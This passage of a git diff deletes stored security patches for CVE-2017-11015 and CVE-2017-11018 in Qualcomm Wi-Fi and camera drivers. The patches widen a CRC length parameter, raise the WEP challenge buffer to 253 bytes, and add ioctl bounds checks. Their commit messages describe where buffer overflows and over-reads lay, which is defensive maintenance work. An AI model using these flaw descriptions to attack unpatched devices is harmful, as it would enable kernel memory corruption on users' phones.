-@@ -58,7 +58,7 @@ void lim_restore_from_auth_state(tpAniSirGlobal,
- uint8_t lim_delete_open_auth_pre_auth_node(tpAniSirGlobal mac_ctx);
- 
- /* Encryption/Decryption related functions */
--void lim_compute_crc32(uint8_t *, uint8_t *, uint8_t);
-+void lim_compute_crc32(uint8_t *, uint8_t *, uint16_t);
- void lim_rc4(uint8_t *, uint8_t *, uint8_t *, uint32_t, uint16_t);
- void lim_encrypt_auth_frame(tpAniSirGlobal, uint8_t, uint8_t *, uint8_t *,
- 			    uint8_t *, uint32_t);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11015/prima/0001.patch b/Patches/Linux_CVEs/CVE-2017-11015/prima/0001.patch
deleted file mode 100644
index d54a44b4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11015/prima/0001.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From ac39bfffe109a6cffcaf3b537505130712161dce Mon Sep 17 00:00:00 2001
-From: Sridhar Selvaraj <sselvara@codeaurora.org>
-Date: Fri, 14 Jul 2017 16:08:23 +0530
-Subject: [PATCH] qcacld-2.0: Update limComputeCrc32 to pass uint16_t
-
-qcacld-3.0 to qcacld-2.0 propagation
-
-Update limComputeCrc32() to pass uint16_t as a length type.
-Currently uint8_t is being passed as length and there will be type
-mismatch when authentication frame to be encrypted will be larger
-than 255 bytes.
-
-Change-Id: Ic009197c13a2d70c9015a184acff2e82bf80eaba
-CRs-Fixed: 2072937
----
- drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.c | 2 +-
- drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.h | 4 ++--
- 2 files changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.c b/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.c
-index 85f12dfb876..8f754c77e9f 100644
---- a/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.c
-+++ b/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.c
-@@ -609,7 +609,7 @@ limEncryptAuthFrame(tpAniSirGlobal pMac, tANI_U8 keyId, tANI_U8 *pKey, tANI_U8 *
-  */
- 
- void
--limComputeCrc32(tANI_U8 *pDest, tANI_U8 * pSrc, tANI_U8 len)
-+limComputeCrc32(tANI_U8 *pDest, tANI_U8 * pSrc, tANI_U16 len)
- {
-     tANI_U32 crc;
-     int i;
-diff --git a/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.h b/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.h
-index 5eafbd7b747..dd097607a18 100644
---- a/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.h
-+++ b/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2013, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2015, 2017 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
-@@ -73,7 +73,7 @@ void               limRestoreFromAuthState(tpAniSirGlobal,
- 
- // Encryption/Decryption related functions
- tCfgWepKeyEntry    *limLookUpKeyMappings(tSirMacAddr);
--void               limComputeCrc32(tANI_U8 *, tANI_U8 *, tANI_U8);
-+void               limComputeCrc32(tANI_U8 *, tANI_U8 *, tANI_U16);
- void               limRC4(tANI_U8 *, tANI_U8 *, tANI_U8 *, tANI_U32, tANI_U16);
- void               limEncryptAuthFrame(tpAniSirGlobal, tANI_U8, tANI_U8 *, tANI_U8 *, tANI_U8 *, tANI_U32);
- tANI_U8                 limDecryptAuthFrame(tpAniSirGlobal, tANI_U8 *, tANI_U8 *, tANI_U8 *, tANI_U32, tANI_U16);
diff --git a/Patches/Linux_CVEs/CVE-2017-11015/prima/0002.patch b/Patches/Linux_CVEs/CVE-2017-11015/prima/0002.patch
deleted file mode 100644
index dd125558..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11015/prima/0002.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From d0cd3ede7c17ee7fcf0f9b6d125d027bc28640be Mon Sep 17 00:00:00 2001
-From: Sridhar Selvaraj <sselvara@codeaurora.org>
-Date: Fri, 14 Jul 2017 15:53:09 +0530
-Subject: [PATCH] qcacld-2.0: Update SIR_MAC_AUTH_CHALLENGE_LENGTH as per IEEE
- spec
-
-qcacld-3.0 to qcacld-2.0 propagation
-
-Update SIR_MAC_AUTH_CHALLENGE_LENGTH to 253 as per IEEE spec.
-Currently value of SIR_MAC_AUTH_CHALLENGE_LENGTH is set to 128.
-This may result in potential buffer overflow since frame parser
-allows challenge text of length upto 253 but driver can not handle
-challenge text longer than 128 bytes.
-
-Change-Id: I7baf860fdde51a14a6573b4f0f26817f5071193e
-CRs-Fixed: 2072937
----
- drivers/staging/prima/CORE/MAC/inc/sirMacProtDef.h | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/staging/prima/CORE/MAC/inc/sirMacProtDef.h b/drivers/staging/prima/CORE/MAC/inc/sirMacProtDef.h
-index cd548457338..7ee9a613e64 100644
---- a/drivers/staging/prima/CORE/MAC/inc/sirMacProtDef.h
-+++ b/drivers/staging/prima/CORE/MAC/inc/sirMacProtDef.h
-@@ -579,7 +579,7 @@
- #define SIR_MAC_MAX_NUMBER_OF_RATES          12
- #define SIR_MAC_MAX_NUM_OF_DEFAULT_KEYS      4
- #define SIR_MAC_KEY_LENGTH                   13   // WEP Maximum key length size
--#define SIR_MAC_AUTH_CHALLENGE_LENGTH        128
-+#define SIR_MAC_AUTH_CHALLENGE_LENGTH        253
- #define SIR_MAC_WEP_IV_LENGTH                4
- #define SIR_MAC_WEP_ICV_LENGTH               4
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-2.0/0003.patch b/Patches/Linux_CVEs/CVE-2017-11015/qcacld-2.0/0003.patch
deleted file mode 100644
index f881cb1d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-2.0/0003.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From d7285900f6fa28b0be51f5d18c52bd06385f8aee Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda <sgirigow@codeaurora.org>
-Date: Mon, 21 Aug 2017 18:23:29 -0700
-Subject: [PATCH] qcacld-2.0: Update limComputeCrc32 to pass uint16_t
-
-qcacld-3.0 to qcacld-2.0 propagation
-
-Update limComputeCrc32() to pass uint16_t as a length type.
-Currently uint8_t is being passed as length and there will be type
-mismatch when authentication frame to be encrypted will be larger
-than 255 bytes.
-
-Change-Id: Ic009197c13a2d70c9015a184acff2e82bf80eaba
-CRs-Fixed: 2072937
-Bug: 64438728
-Signed-off-by: Srinivas Girigowda <sgirigow@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.c | 2 +-
- drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.h | 4 ++--
- 2 files changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.c b/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.c
-index 0241dc010adce..049c86aa55f78 100644
---- a/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.c
-+++ b/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.c
-@@ -647,7 +647,7 @@ limEncryptAuthFrame(tpAniSirGlobal pMac, tANI_U8 keyId, tANI_U8 *pKey, tANI_U8 *
-  */
- 
- void
--limComputeCrc32(tANI_U8 *pDest, tANI_U8 * pSrc, tANI_U8 len)
-+limComputeCrc32(tANI_U8 *pDest, tANI_U8 * pSrc, tANI_U16 len)
- {
-     tANI_U32 crc;
-     int i;
-diff --git a/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.h b/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.h
-index 4ede5005b556f..9139ce20f3b4c 100644
---- a/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.h
-+++ b/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2011-2015 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2015, 2017 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
-@@ -59,7 +59,7 @@ tANI_U8 limDeleteOpenAuthPreAuthNode(tpAniSirGlobal pMac);
- 
- // Encryption/Decryption related functions
- tCfgWepKeyEntry    *limLookUpKeyMappings(tSirMacAddr);
--void               limComputeCrc32(tANI_U8 *, tANI_U8 *, tANI_U8);
-+void               limComputeCrc32(tANI_U8 *, tANI_U8 *, tANI_U16);
- void               limRC4(tANI_U8 *, tANI_U8 *, tANI_U8 *, tANI_U32, tANI_U16);
- void               limEncryptAuthFrame(tpAniSirGlobal, tANI_U8, tANI_U8 *, tANI_U8 *, tANI_U8 *, tANI_U32);
- tANI_U8                 limDecryptAuthFrame(tpAniSirGlobal, tANI_U8 *, tANI_U8 *, tANI_U8 *, tANI_U32, tANI_U16);
diff --git a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-2.0/0004.patch b/Patches/Linux_CVEs/CVE-2017-11015/qcacld-2.0/0004.patch
deleted file mode 100644
index 18aee47d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-2.0/0004.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From a50ca3ce494ab6bb6b2e37cdd0428aa6d6260bef Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda <sgirigow@codeaurora.org>
-Date: Mon, 21 Aug 2017 21:25:55 -0700
-Subject: [PATCH] qcacld-2.0: Update SIR_MAC_AUTH_CHALLENGE_LENGTH as per IEEE
- spec
-
-qcacld-3.0 to qcacld-2.0 propagation
-
-Update SIR_MAC_AUTH_CHALLENGE_LENGTH to 253 as per IEEE spec.
-Currently value of SIR_MAC_AUTH_CHALLENGE_LENGTH is set to 128.
-This may result in potential buffer overflow since frame parser
-allows challenge text of length upto 253 but driver can not handle
-challenge text longer than 128 bytes.
-
-Change-Id: I7baf860fdde51a14a6573b4f0f26817f5071193e
-CRs-Fixed: 2072937
-Bug: 64438728
-Signed-off-by: Srinivas Girigowda <sgirigow@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/MAC/inc/sirMacProtDef.h | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/MAC/inc/sirMacProtDef.h b/drivers/staging/qcacld-2.0/CORE/MAC/inc/sirMacProtDef.h
-index bb43167c255cc..c5d8ad5dbcbc0 100644
---- a/drivers/staging/qcacld-2.0/CORE/MAC/inc/sirMacProtDef.h
-+++ b/drivers/staging/qcacld-2.0/CORE/MAC/inc/sirMacProtDef.h
-@@ -584,7 +584,7 @@
- #define SIR_MAC_MAX_NUMBER_OF_RATES          12
- #define SIR_MAC_MAX_NUM_OF_DEFAULT_KEYS      4
- #define SIR_MAC_KEY_LENGTH                   13   // WEP Maximum key length size
--#define SIR_MAC_AUTH_CHALLENGE_LENGTH        128
-+#define SIR_MAC_AUTH_CHALLENGE_LENGTH        253
- #define SIR_MAC_WEP_IV_LENGTH                4
- #define SIR_MAC_WEP_ICV_LENGTH               4
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-3.0/0005.patch b/Patches/Linux_CVEs/CVE-2017-11015/qcacld-3.0/0005.patch
deleted file mode 100644
index 4a03b1cb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-3.0/0005.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From ec58bc99e29d89f8e164954999ef8a45cec21754 Mon Sep 17 00:00:00 2001
-From: Krishna Kumaar Natarajan <kknatara@codeaurora.org>
-Date: Wed, 5 Jul 2017 16:47:45 -0700
-Subject: qcacld-3.0: Update lim_compute_crc32() to pass uint16_t
-
-Update lim_compute_crc32() to pass uint16_t as a length type.
-Currently uint8_t is being passed as length and there will be type
-mismatch when authentication frame to be encrypted will be larger
-than 255 bytes.
-
-Change-Id: Ic009197c13a2d70c9015a184acff2e82bf80eaba
-CRs-Fixed: 2060959
----
- core/mac/src/pe/lim/lim_security_utils.c | 2 +-
- core/mac/src/pe/lim/lim_security_utils.h | 4 ++--
- 2 files changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/core/mac/src/pe/lim/lim_security_utils.c b/core/mac/src/pe/lim/lim_security_utils.c
-index c5938c2..1a2964c 100644
---- a/core/mac/src/pe/lim/lim_security_utils.c
-+++ b/core/mac/src/pe/lim/lim_security_utils.c
-@@ -596,7 +596,7 @@ lim_encrypt_auth_frame(tpAniSirGlobal pMac, uint8_t keyId, uint8_t *pKey,
-  * @return None
-  */
- 
--void lim_compute_crc32(uint8_t *pDest, uint8_t *pSrc, uint8_t len)
-+void lim_compute_crc32(uint8_t *pDest, uint8_t *pSrc, uint16_t len)
- {
- 	uint32_t crc;
- 	int i;
-diff --git a/core/mac/src/pe/lim/lim_security_utils.h b/core/mac/src/pe/lim/lim_security_utils.h
-index c5b30ba..c3410ea 100644
---- a/core/mac/src/pe/lim/lim_security_utils.h
-+++ b/core/mac/src/pe/lim/lim_security_utils.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2011-2015 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2015, 2017 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
-@@ -58,7 +58,7 @@ void lim_restore_from_auth_state(tpAniSirGlobal,
- uint8_t lim_delete_open_auth_pre_auth_node(tpAniSirGlobal mac_ctx);
- 
- /* Encryption/Decryption related functions */
--void lim_compute_crc32(uint8_t *, uint8_t *, uint8_t);
-+void lim_compute_crc32(uint8_t *, uint8_t *, uint16_t);
- void lim_rc4(uint8_t *, uint8_t *, uint8_t *, uint32_t, uint16_t);
- void lim_encrypt_auth_frame(tpAniSirGlobal, uint8_t, uint8_t *, uint8_t *,
- 			    uint8_t *, uint32_t);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-3.0/0006.patch b/Patches/Linux_CVEs/CVE-2017-11015/qcacld-3.0/0006.patch
deleted file mode 100644
index 5ceaaed6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-3.0/0006.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 1ef6add65a36de6c4da788f776de2b5b5c528d8e Mon Sep 17 00:00:00 2001
-From: Krishna Kumaar Natarajan <kknatara@codeaurora.org>
-Date: Wed, 5 Jul 2017 16:38:54 -0700
-Subject: qcacld-3.0: Update SIR_MAC_AUTH_CHALLENGE_LENGTH as per IEEE spec
-
-Update SIR_MAC_AUTH_CHALLENGE_LENGTH to 253 as per IEEE spec.
-Currently value of SIR_MAC_AUTH_CHALLENGE_LENGTH is set to 128.
-This may result in potential buffer overflow since frame parser
-allows challenge text of length upto 253 but driver can not handle
-challenge text longer than 128 bytes.
-
-Change-Id: I7baf860fdde51a14a6573b4f0f26817f5071193e
-CRs-Fixed: 2060959
----
- core/mac/inc/sir_mac_prot_def.h | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/core/mac/inc/sir_mac_prot_def.h b/core/mac/inc/sir_mac_prot_def.h
-index fbbd37e..be47e13 100644
---- a/core/mac/inc/sir_mac_prot_def.h
-+++ b/core/mac/inc/sir_mac_prot_def.h
-@@ -554,7 +554,7 @@
- #define SIR_MAC_MAX_NUMBER_OF_RATES          12
- #define SIR_MAC_MAX_NUM_OF_DEFAULT_KEYS      4
- #define SIR_MAC_KEY_LENGTH                   13 /* WEP Maximum key length size */
--#define SIR_MAC_AUTH_CHALLENGE_LENGTH        128
-+#define SIR_MAC_AUTH_CHALLENGE_LENGTH        253
- #define SIR_MAC_WEP_IV_LENGTH                4
- #define SIR_MAC_WEP_ICV_LENGTH               4
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11018/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11018/ANY/0001.patch
deleted file mode 100644
index 95654041..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11018/ANY/0001.patch
+++ /dev/null
@@ -1,531 +0,0 @@
-From 1d718286c4c482502a2c4356cebef28aef2fb01f Mon Sep 17 00:00:00 2001
-From: Rahul Sharma <sharah@codeaurora.org>
-Date: Wed, 28 Jun 2017 15:46:19 +0530
-Subject: msm: vfe : Fix for multiple buffer over read/write
-
-Implemented validation of user space values in ioctl call
-before processing buffers in response to user commands.
-
-Change-Id: Icf6e49650bab358b764ebf1db24925a4063c5842
-Signed-off-by: Rahul Sharma <sharah@codeaurora.org>
----
- drivers/media/video/msm/vfe/msm_vfe32.c | 246 ++++++++++++++++++++++++++++++++
- 1 file changed, 246 insertions(+)
-
-diff --git a/drivers/media/video/msm/vfe/msm_vfe32.c b/drivers/media/video/msm/vfe/msm_vfe32.c
-index 64f3e7b..1509a04 100644
---- a/drivers/media/video/msm/vfe/msm_vfe32.c
-+++ b/drivers/media/video/msm/vfe/msm_vfe32.c
-@@ -2275,6 +2275,7 @@ static int vfe32_proc_general(
- 	uint32_t *cmdp_local = NULL;
- 	uint32_t snapshot_cnt = 0;
- 	uint32_t temp1 = 0, temp2 = 0;
-+	uint32_t maxvalue = 0;
- 	struct msm_camera_vfe_params_t vfe_params;
- 
- 	switch (cmd->id) {
-@@ -2373,6 +2374,14 @@ static int vfe32_proc_general(
- 				 __func__);
- 			goto proc_general_done;
- 		}
-+		if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
-+		if (cmd->length < vfe32_cmd[cmd->id].length) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		cmdp = kmalloc(cmd->length, GFP_ATOMIC);
- 		if (!cmdp) {
- 			rc = -ENOMEM;
-@@ -2407,6 +2416,14 @@ static int vfe32_proc_general(
- 				__func__);
- 			goto proc_general_done;
- 		}
-+		if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
-+		if (cmd->length < vfe32_cmd[cmd->id].length) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		cmdp = kmalloc(cmd->length, GFP_ATOMIC);
- 		if (!cmdp) {
- 			rc = -ENOMEM;
-@@ -2441,6 +2458,14 @@ static int vfe32_proc_general(
- 				 __func__);
- 			goto proc_general_done;
- 		}
-+		if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
-+		if (cmd->length < vfe32_cmd[cmd->id].length) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		cmdp = kmalloc(cmd->length, GFP_ATOMIC);
- 		if (!cmdp) {
- 			rc = -ENOMEM;
-@@ -2471,6 +2496,14 @@ static int vfe32_proc_general(
- 				 __func__);
- 			goto proc_general_done;
- 		}
-+		if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
-+		if (cmd->length < vfe32_cmd[cmd->id].length) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		cmdp = kmalloc(cmd->length, GFP_ATOMIC);
- 		if (!cmdp) {
- 			rc = -ENOMEM;
-@@ -2502,6 +2535,14 @@ static int vfe32_proc_general(
- 				__func__);
- 			goto proc_general_done;
- 		}
-+		if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
-+		if (cmd->length < vfe32_cmd[cmd->id].length) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		cmdp = kmalloc(cmd->length, GFP_ATOMIC);
- 		if (!cmdp) {
- 			rc = -ENOMEM;
-@@ -2527,6 +2568,14 @@ static int vfe32_proc_general(
- 				__func__);
- 			goto proc_general_done;
- 		}
-+		if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
-+		if (cmd->length < vfe32_cmd[cmd->id].length) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		cmdp = kmalloc(cmd->length, GFP_ATOMIC);
- 		if (!cmdp) {
- 			rc = -ENOMEM;
-@@ -2589,6 +2638,14 @@ static int vfe32_proc_general(
- 			VFE_STATS_CFG);
- 		msm_camera_io_w(module_val,
- 			vfe32_ctrl->share_ctrl->vfebase + VFE_MODULE_CFG);
-+		if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
-+		if (cmd->length < vfe32_cmd[cmd->id].length) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		cmdp = kmalloc(cmd->length, GFP_ATOMIC);
- 		if (!cmdp) {
- 			rc = -ENOMEM;
-@@ -2627,6 +2684,10 @@ static int vfe32_proc_general(
- 		new_val = *cmdp_local;
- 		old_val &= MCE_EN_MASK;
- 		new_val = new_val | old_val;
-+		if (cmd->length < 4) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase +
- 			V32_CHROMA_SUP_OFF + 4, &new_val, 4);
-@@ -2637,10 +2698,23 @@ static int vfe32_proc_general(
- 		new_val = *cmdp_local;
- 		old_val &= MCE_Q_K_MASK;
- 		new_val = new_val | old_val;
-+		if (cmd->length < (4 + sizeof(uint32_t)*1)) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase +
- 			V32_CHROMA_SUP_OFF + 8, &new_val, 4);
- 		cmdp_local += 1;
-+		if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
-+		if (cmd->length < (vfe32_cmd[cmd->id].length +
-+		sizeof(uint32_t) * (1 + 1))) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase +
- 			vfe32_cmd[cmd->id].offset,
-@@ -2661,6 +2735,10 @@ static int vfe32_proc_general(
- 			goto proc_general_done;
- 		}
- 		cmdp_local = cmdp;
-+		if (cmd->length < 4) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(vfe32_ctrl->share_ctrl->vfebase +
- 			V32_CHROMA_SUP_OFF, cmdp_local, 4);
- 
-@@ -2673,6 +2751,11 @@ static int vfe32_proc_general(
- 			V32_CHROMA_SUP_OFF + 4);
- 		old_val &= ~MCE_EN_MASK;
- 		new_val = new_val | old_val;
-+		/* As cmdp_local got incremented by 1*/
-+		if (cmd->length < (4 + sizeof(uint32_t) * 1)) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase +
- 			V32_CHROMA_SUP_OFF + 4, &new_val, 4);
-@@ -2683,6 +2766,10 @@ static int vfe32_proc_general(
- 		new_val = *cmdp_local;
- 		old_val &= ~MCE_Q_K_MASK;
- 		new_val = new_val | old_val;
-+		if (cmd->length < (4 + sizeof(uint32_t) * (1 + 1)))	{
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase +
- 			V32_CHROMA_SUP_OFF + 8, &new_val, 4);
-@@ -2704,12 +2791,22 @@ static int vfe32_proc_general(
- 			goto proc_general_done;
- 		}
- 		cmdp_local = cmdp;
-+		if (cmd->length < 16) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase +
- 			vfe32_cmd[cmd->id].offset,
- 			cmdp_local, 16);
- 		cmdp_local += 4;
- 		vfe32_program_dmi_cfg(ROLLOFF_RAM0_BANK0, vfe32_ctrl);
-+		if (cmd->length < (sizeof(uint32_t) *
-+		(4 + V32_MESH_ROLL_OFF_INIT_TABLE_SIZE * 2 +
-+		V32_MESH_ROLL_OFF_DELTA_TABLE_SIZE * 2))) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		/* for loop for extrcting init table. */
- 		for (i = 0; i < (V32_MESH_ROLL_OFF_INIT_TABLE_SIZE * 2); i++) {
- 			msm_camera_io_w(*cmdp_local ,
-@@ -2773,6 +2870,14 @@ static int vfe32_proc_general(
- 		}
- 		break;
- 	case VFE_CMD_LA_CFG:
-+		if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
-+		if (cmd->length < vfe32_cmd[cmd->id].length) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		cmdp = kmalloc(cmd->length, GFP_ATOMIC);
- 		if (!cmdp) {
- 			rc = -ENOMEM;
-@@ -2813,6 +2918,11 @@ static int vfe32_proc_general(
- 		cmdp_local = cmdp + 1;
- 		old_val = msm_camera_io_r(
- 			vfe32_ctrl->share_ctrl->vfebase + V32_LA_OFF);
-+		if (cmd->length < (sizeof(uint32_t) * (1 +
-+		(VFE32_LA_TABLE_LENGTH / 2)))) {
-+			rc  = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		if (old_val != 0x0)
- 			vfe32_write_la_cfg(LUMA_ADAPT_LUT_RAM_BANK0,
- 				cmdp_local, vfe32_ctrl);
-@@ -2861,6 +2971,10 @@ static int vfe32_proc_general(
- 		break;
- 	case VFE_CMD_SK_ENHAN_CFG:
- 	case VFE_CMD_SK_ENHAN_UPDATE:{
-+		if (cmd->length < V32_SCE_LEN) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		cmdp = kmalloc(cmd->length, GFP_ATOMIC);
- 		if (!cmdp) {
- 			rc = -ENOMEM;
-@@ -2895,17 +3009,31 @@ static int vfe32_proc_general(
- 			goto proc_general_done;
- 		}
- 		cmdp_local = cmdp;
-+		if (cmd->length < V32_LINEARIZATION_LEN1) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase +
- 			V32_LINEARIZATION_OFF1,
- 			cmdp_local, V32_LINEARIZATION_LEN1);
- 		cmdp_local += 4;
-+		if (cmd->length < (V32_LINEARIZATION_LEN2 +
-+		sizeof(uint32_t) * 4)) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase +
- 			V32_LINEARIZATION_OFF2,
- 			cmdp_local, V32_LINEARIZATION_LEN2);
- 
- 		cmdp_local = cmdp + 17;
-+		if (cmd->length < (sizeof(uint32_t) *
-+		(VFE32_LINEARIZATON_TABLE_LENGTH + 17))) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		vfe32_write_linear_cfg(BLACK_LUT_RAM_BANK0,
- 					cmdp_local, vfe32_ctrl);
- 		break;
-@@ -2923,11 +3051,20 @@ static int vfe32_proc_general(
- 		}
- 		cmdp_local = cmdp;
- 		cmdp_local++;
-+		if (cmd->length < V32_LINEARIZATION_LEN1) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase +
- 			V32_LINEARIZATION_OFF1 + 4,
- 			cmdp_local, (V32_LINEARIZATION_LEN1 - 4));
- 		cmdp_local += 3;
-+		if (cmd->length < (V32_LINEARIZATION_LEN2 +
-+		sizeof(uint32_t) * (1 + 3))) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase +
- 			V32_LINEARIZATION_OFF2,
-@@ -2938,6 +3075,11 @@ static int vfe32_proc_general(
- 				vfe32_ctrl->share_ctrl->vfebase +
- 				V32_LINEARIZATION_OFF1);
- 
-+		if (cmd->length < (sizeof(uint32_t) *
-+		(VFE32_LINEARIZATON_TABLE_LENGTH + 17))) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		if (old_val != 0x0)
- 			vfe32_write_linear_cfg(BLACK_LUT_RAM_BANK0,
- 						cmdp_local, vfe32_ctrl);
-@@ -3084,11 +3226,24 @@ static int vfe32_proc_general(
- 		new_val = new_val | old_val;
- 		*cmdp_local = new_val;
- 
-+		if (cmd->length < 4) {
-+			rc = -EINVAL;
-+			goto proc_general_done;
-+		}
- 		msm_camera_io_memcpy(
- 			vfe32_ctrl->share_ctrl->vfebase + V32_DEMOSAICV3_0_OFF,
- 			cmdp_local, 4);
- 
- 		cmdp_local += 1;
-+		if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) {
-+			rc  = -EINVAL;
-+			goto proc_general_done;
-+		}
-+		if (cmd->length < (vfe32_cmd[cmd->id].length +
-+		sizeof(uint32_t) * 1)) {
-+			rc = -EINVAL;
